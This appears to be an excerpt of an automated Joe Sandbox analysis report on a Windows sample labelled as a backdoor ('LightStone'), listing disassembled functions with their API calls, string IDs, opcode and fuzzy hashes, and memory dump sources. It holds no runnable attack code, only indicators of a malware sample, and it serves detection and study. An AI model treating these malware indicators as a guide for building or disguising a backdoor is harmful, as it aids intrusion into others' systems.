                                                • String ID: 0&`$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                                • API String ID: 2506810119-3753216696
                                                • Opcode ID: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
                                                • Instruction ID: 575bae82f0fdd5ce8240301b7cb180ac6b6a5b456a2a68b3b95a2f7199189721
                                                • Opcode Fuzzy Hash: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
                                                • Instruction Fuzzy Hash: 78319171A1820CEFDB25EF99DC899BEBBECEB94710B144066E60497311D6B44E40CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • OleInitialize.OLE32(00000000), ref: 007EA34E
                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
                                                • SHGetMalloc.SHELL32(00818430), ref: 007EA38F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                • String ID: riched20.dll$3To
                                                • API String ID: 3498096277-2168385784
                                                • Opcode ID: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
                                                • Instruction ID: 7acad33624b285af761e64f4aecf488f9c0709401e5ddc76b635572a5918c19d
                                                • Opcode Fuzzy Hash: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
                                                • Instruction Fuzzy Hash: 36F04FB1C00209ABCB10AF9AD8499EFFBFCFF94301F00455AE914E2200DBB856458BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007D78AD,?,00000005,?,00000011), ref: 007D9A4C
                                                • GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A59
                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007D78AD,?,00000005,?), ref: 007D9A8E
                                                • GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A96
                                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9ADB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$CreateErrorLast$Time
                                                • String ID:
                                                • API String ID: 1999340476-0
                                                • Opcode ID: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
                                                • Instruction ID: ea42e4165e179bdc80881cd11b771350e3a308911589b6b7e289376fa6228bfc
                                                • Opcode Fuzzy Hash: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
                                                • Instruction Fuzzy Hash: CE414631544B46AFE3209B20CC09BDABBE4BB45324F10471BF6E4962D1E779A988CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 007FB619
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
                                                • _free.LIBCMT ref: 007FB675
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
                                                • Instruction ID: 73f38be647fb539191b585f9fbda30b7ffe27485fbe8038583327cf556212a54
                                                • Opcode Fuzzy Hash: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
                                                • Instruction Fuzzy Hash: 4101A772611619BF63611A76AC8CC7F7A6DEEC7BA13250229FE04D7310DF68CD0191B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
                                                • IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                • TranslateMessage.USER32(?), ref: 007EACB8
                                                • DispatchMessageW.USER32(?), ref: 007EACC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 1266772231-0
                                                • Opcode ID: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
                                                • Instruction ID: 5244cfffa112e58e66393479fa7a8fb58d63dbaa7845d6c3ca0b634fa2aa54f9
                                                • Opcode Fuzzy Hash: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
                                                • Instruction Fuzzy Hash: C4F01D71902229AB8B249BE2AC4CDEB7F6CFE452517404915F405D2110EA28E409CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetClassNameW.USER32(?,?,00000050), ref: 007EA2DE
                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 007EA315
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007EA305
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                • String ID: EDIT
                                                • API String ID: 4243998846-3080729518
                                                • Opcode ID: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
                                                • Instruction ID: 97872541de9ad8db66a0caf6d2bd67ebb0e2778282fe2dab56aad7f11f50fedd
                                                • Opcode Fuzzy Hash: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
                                                • Instruction Fuzzy Hash: 32F02732B0262877E7305665AC09FDB736CAF8AB00F440062BE04E3180D764AD45C6F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
                                                • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable
                                                • String ID: sfxcmd$sfxpar
                                                • API String ID: 1431749950-3493335439
                                                • Opcode ID: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
                                                • Instruction ID: 39a729d5a8852a8de155c25a376a780a5a479bcbe192e552686b249802a0bc54
                                                • Opcode Fuzzy Hash: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
                                                • Instruction Fuzzy Hash: 5EF0A072802628E7DB306F919C1AABE7B6CFF0DB41B044412FD89A6241D668CD40DAF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D985E
                                                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 007D9876
                                                • GetLastError.KERNEL32 ref: 007D98A8
                                                • GetLastError.KERNEL32 ref: 007D98C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FileHandleRead
                                                • String ID:
                                                • API String ID: 2244327787-0
                                                • Opcode ID: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
                                                • Instruction ID: 746c4741fa008068473f36ddc1fd8c75d81c6045db72c7e7d464b9f1575d7333
                                                • Opcode Fuzzy Hash: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
                                                • Instruction Fuzzy Hash: 2E118E31900604EFDB205B51C804A797BBDFB46B31F14C52BFA6A86790D77D9E40AF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,007F3713,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue), ref: 007FA526
                                                • GetLastError.KERNEL32(?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000,00000364,?,007F9077), ref: 007FA532
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000), ref: 007FA540
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
                                                • Instruction ID: af4beab95fa9936aade42eeab0c04a2c7636275d8bf972fd3e9a8c9ca7cbcd01
                                                • Opcode Fuzzy Hash: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
                                                • Instruction Fuzzy Hash: 8A01F7B661522AFBCB218B689C44A767B9CBF45BA1B200521FA0ED7340D729D920C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FB610: GetEnvironmentStringsW.KERNEL32 ref: 007FB619
                                                  • Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C
                                                  • Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
                                                  • Part of subcall function 007FB610: _free.LIBCMT ref: 007FB675
                                                  • Part of subcall function 007FB610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684
                                                • _free.LIBCMT ref: 007F79FD
                                                • _free.LIBCMT ref: 007F7A04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                • String ID: p`
                                                • API String ID: 400815659-1664568892
                                                • Opcode ID: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
                                                • Instruction ID: 5733711445741a055b37747cd1b49964e846b1c75fcb63c6b39193e919212b0e
                                                • Opcode Fuzzy Hash: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
                                                • Instruction Fuzzy Hash: 9AE0E55350D54E81DBA5B67A6C0E67F0204ABC1731B110B1AFB20DB3C2CE5C88024096
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,007DCC94,00000001,?,?,?,00000000,007E4ECD,?,?,?), ref: 007D9F4C
                                                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,007E4ECD,?,?,?,?,?,007E4972,?), ref: 007D9F8E
                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,007DCC94,00000001,?,?), ref: 007D9FB8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileWrite$Handle
                                                • String ID:
                                                • API String ID: 4209713984-0
                                                • Opcode ID: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
                                                • Instruction ID: ad1e375dcdb436fe0457dd8271f8a896edba74f9ab587f4aa498106fb0209be5
                                                • Opcode Fuzzy Hash: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
                                                • Instruction Fuzzy Hash: 75310271608305ABDF109F24D948B6ABBB8FB40710F044A5AFA85DB381C778D948CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA22E
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA261
                                                • GetLastError.KERNEL32(?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA27E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$ErrorLast
                                                • String ID:
                                                • API String ID: 2485089472-0
                                                • Opcode ID: 5fd9ee4aaecc854784e4e5a270340049d6273d83d967eb1603723c79d7ed57e1
                                                • Instruction ID: 6df61aff43e535a5f05f4d9f723bf0b96f886077af208283dc7c5dc16ae70a32
                                                • Opcode Fuzzy Hash: 5fd9ee4aaecc854784e4e5a270340049d6273d83d967eb1603723c79d7ed57e1
                                                • Instruction Fuzzy Hash: F401D231581618B6DB32ABB64C09FEE337CBF4A741F040457F840D5251CB6EEA4086B3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007FB019
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
                                                • Instruction ID: 6a76ad0105e9acdcba8d65c60cc0fc501cd89bb6ab461c110d36e957b4e5a86c
                                                • Opcode Fuzzy Hash: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
                                                • Instruction Fuzzy Hash: D8410A7050434C9ADF218E64CC94BF7BBAEEB45304F2404EDE69A87242E7399E45DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 007FA79D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
                                                • Instruction ID: 715ce19f9d0709159799cf4d9e225d568e96051ec86962175e53238416e4cb08
                                                • Opcode Fuzzy Hash: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
                                                • Instruction Fuzzy Hash: B601137260020CBBCF126FA4DC05DAE3F66FF08750F054114FE2866260CA3A9A31EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007F9D2F), ref: 007FA715
                                                Strings
                                                • InitializeCriticalSectionEx, xrefs: 007FA6E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 2593887523-3084827643
                                                • Opcode ID: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
                                                • Instruction ID: 815fbaed747241712213ac70f771041d86c2a83237b11ca3fcf02542361f70a5
                                                • Opcode Fuzzy Hash: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
                                                • Instruction Fuzzy Hash: B0F0BE71A4521CBBCB116F64DC09CAE7F65FF18720B408064FD295A3A0DA765A10EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
                                                • Instruction ID: 5939405927326e38afb5691d40f82675eb530c38f730e21af8fcf6e4c407e683
                                                • Opcode Fuzzy Hash: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
                                                • Instruction Fuzzy Hash: E6E055B0B4522CBBD3146B649C068BEBB54EF28711B410118FC1997390DD791E0096E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 007F32AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
                                                • Instruction ID: c25f51442a3f4eaf0e5ff3ab02a032a4bacde5dc32be137d6c9be722671f93f7
                                                • Opcode Fuzzy Hash: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
                                                • Instruction Fuzzy Hash: FCD0C221781A39AAC55032856C029BB7B44EB01BB2B450252FF289A382A46A491045F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EE20B
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID: 3To
                                                • API String ID: 1269201914-245939750
                                                • Opcode ID: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
                                                • Instruction ID: cd5cc96f415ee0e808f4d3890acb1cd7ce36d9d4d278bbcfbe2d1a2fea694a90
                                                • Opcode Fuzzy Hash: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
                                                • Instruction Fuzzy Hash: ABB012A126F441BC320C5143BD1AC36031CE4C4B50330C41AB325D41C095889D0D4032
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007FB1EA,?,00000000), ref: 007FB3C4
                                                • GetCPInfo.KERNEL32(00000000,007FB1EA,?,?,?,007FB1EA,?,00000000), ref: 007FB3D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
